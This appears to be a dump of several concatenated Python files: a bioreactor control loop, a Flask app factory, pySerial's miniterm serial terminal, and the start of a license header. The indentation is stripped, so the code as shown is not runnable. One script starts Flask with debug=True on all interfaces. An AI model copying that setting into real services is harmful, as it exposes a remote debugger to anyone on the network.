# gains=['x10','x10','x10','x10','x10','x10','x10','x1']
# gi=-1
# for item in items:
# gi=gi+1
# SetOutputOn(M,item,1)
# GetSpectrum(M,gains[gi])
# SetOutputOn(M,item,0)
# for band in bands:
# sysData[M]['biofilm'][item][band]=int(sysData[M]['AS7341']['spectrum'][band])
sysData[M]['OD']['Measuring']=0
if (sysData[M]['OD']['ON']==1):
RegulateOD(M) #Function that calculates new target pump rates, and sets pumps to desired rates.
LightActuation(M,1)
if (sysData[M]['Custom']['ON']==1): #Check if we have enabled custom programs
CustomThread=Thread(target = CustomProgram, args=(M,)) #We run this in a thread in case we are doing something slow, we dont want to hang up the main l00p. The comma after M is to cast the args as a tuple to prevent it iterating over the thread M
CustomThread.setDaemon(True)
CustomThread.start();
Pump2Ontime=sysData[M]['Experiment']['cycleTime']*1.05*abs(sysData[M]['Pump2']['target'])*sysData[M]['Pump2']['ON']+0.5 #The amount of time Pump2 is going to be on for following RegulateOD above.
time.sleep(Pump2Ontime) #Pause here is to prevent output pumping happening at the same time as stirring.
SetOutputOn(M,'Stir',1) #Start stirring again.
if(sysData[M]['Experiment']['cycles']%10==9): #Dont want terminal getting unruly, so clear it each 10 rotations.
clearTerminal(M)
#######Below stores all the results for plotting later
sysData[M]['time']['record'].append(elapsedTimeSeconds)
sysData[M]['OD']['record'].append(sysData[M]['OD']['current'])
sysData[M]['OD']['targetrecord'].append( sysData[M]['OD']['target']*sysData[M]['OD']['ON'])
sysData[M]['Thermostat']['record'].append(sysData[M]['Thermostat']['target']*float(sysData[M]['Thermostat']['ON']))
sysData[M]['Light']['record'].append(float(sysData[M]['Light']['ON']))
sysData[M]['ThermometerInternal']['record'].append(sysData[M]['ThermometerInternal']['current'])
sysData[M]['ThermometerExternal']['record'].append(sysData[M]['ThermometerExternal']['current'])
sysData[M]['ThermometerIR']['record'].append(sysData[M]['ThermometerIR']['current'])
sysData[M]['Pump1']['record'].append(sysData[M]['Pump1']['target']*float(sysData[M]['Pump1']['ON']))
sysData[M]['Pump2']['record'].append(sysData[M]['Pump2']['target']*float(sysData[M]['Pump2']['ON']))
sysData[M]['Pump3']['record'].append(sysData[M]['Pump3']['target']*float(sysData[M]['Pump3']['ON']))
sysData[M]['Pump4']['record'].append(sysData[M]['Pump4']['target']*float(sysData[M]['Pump4']['ON']))
sysData[M]['GrowthRate']['record'].append(sysData[M]['GrowthRate']['current']*float(sysData[M]['Zigzag']['ON']))
for FP in ['FP1','FP2','FP3']:
if sysData[M][FP]['ON']==1:
sysData[M][FP]['BaseRecord'].append(sysData[M][FP]['Base'])
sysData[M][FP]['Emit1Record'].append(sysData[M][FP]['Emit1'])
if (sysData[M][FP]['Emit2Band']!= "OFF"):
sysData[M][FP]['Emit2Record'].append(sysData[M][FP]['Emit2'])
else:
sysData[M][FP]['Emit2Record'].append(0.0)
else:
sysData[M][FP]['BaseRecord'].append(0.0)
sysData[M][FP]['Emit1Record'].append(0.0)
sysData[M][FP]['Emit2Record'].append(0.0)
#We downsample our records such that the size of the data vectors being plot in the web interface does not get unruly.
if (len(sysData[M]['time']['record'])>200):
downsample(M)
#### Writing Results to data files
csvData(M) #This command writes system data to a CSV file for future keeping.
#And intermittently write the setup parameters to a data file.
if(sysData[M]['Experiment']['cycles']%10==1): #We only write whole configuration file each 10 cycles since it is not really that important.
TempStartTime=sysData[M]['Experiment']['startTimeRaw']
sysData[M]['Experiment']['startTimeRaw']=0 #We had to set this to zero during the write operation since the system does not like writing data in such a format.
filename = sysData[M]['Experiment']['startTime'] + '_' + M + '.txt'
filename=filename.replace(":","_")
f = open(filename,'w')
simplejson.dump(sysData[M],f)
f.close()
sysData[M]['Experiment']['startTimeRaw']=TempStartTime
##### Written
if (sysData[M]['Experiment']['ON']==0):
turnEverythingOff(M)
addTerminal(M,'Experiment Stopped')
return
nowend=datetime.now()
elapsedTime2=nowend-now
elapsedTimeSeconds2=round(elapsedTime2.total_seconds(),2)
sleeptime=CycleTime-elapsedTimeSeconds2
if (sleeptime<0):
sleeptime=0
addTerminal(M,'Experiment Cycle Time is too short!!!')
time.sleep(sleeptime)
LightActuation(M,0) #Turn light actuation off if it is running.
addTerminal(M,'Cycle ' + str(sysData[M]['Experiment']['cycles']) + ' Complete')
#Now we run this function again if the automated experiment is still going.
if (sysData[M]['Experiment']['ON'] and sysData[M]['Experiment']['threadCount']==currentThread):
sysDevices[M]['Experiment']=Thread(target = runExperiment, args=(M,'placeholder'))
sysDevices[M]['Experiment'].setDaemon(True)
sysDevices[M]['Experiment'].start();
else:
turnEverythingOff(M)
addTerminal(M,'Experiment Stopped')
if __name__ == '__main__':
initialiseAll()
application.run(debug=True,threaded=True,host='0.0.0.0',port=5000)
initialiseAll()
print(str(datetime.now()) + ' Start Up Complete')
|
__init__.py
|
import sys
#import webview
import threading
from dc.utils.commun import Commun
class App:
func = Commun()
def create_app(self):
"""Create the app from Blueprints"""
from flask import Flask
app = Flask(__name__)
from dc.views.users import user_bp
from dc.views.commun import com_bp
from dc.views.batches import batches_bp
# from fup.views.createbatch import createbatch
# from fup.views.updatebatch import updatebatch
app.register_blueprint(user_bp)
app.register_blueprint(com_bp)
app.register_blueprint(batches_bp)
# app.register_blueprint(createbatch)
# app.register_blueprint(updatebatch)
return app
def run_server(self, run_in_browser=True, webview_name="App", width=1024, height=720):
"""Run in browser or in pywebview browser"""
app = self.create_app()
if run_in_browser:
conf = self.func.config_info()
port_nbr = int(conf["port"])
app.run(host='127.0.0.1', port=port_nbr, debug=True)
else:
def start_server():
app.run()
if __name__ == '__main__':
t = threading.Thread(target=start_server)
t.daemon = True
t.start()
webview.create_window(webview_name, "http://127.0.0.1:5000/", width=width, height=height)
sys.exit()
|
miniterm.py
|
#!/home/paulo/Área de Trabalho/gnss-iot-server/site/ENV/bin/python3
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
node_tools.py
|
# Copyright (c) 2014 Artem Rozumenko (artyom.rozumenko@gmail.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
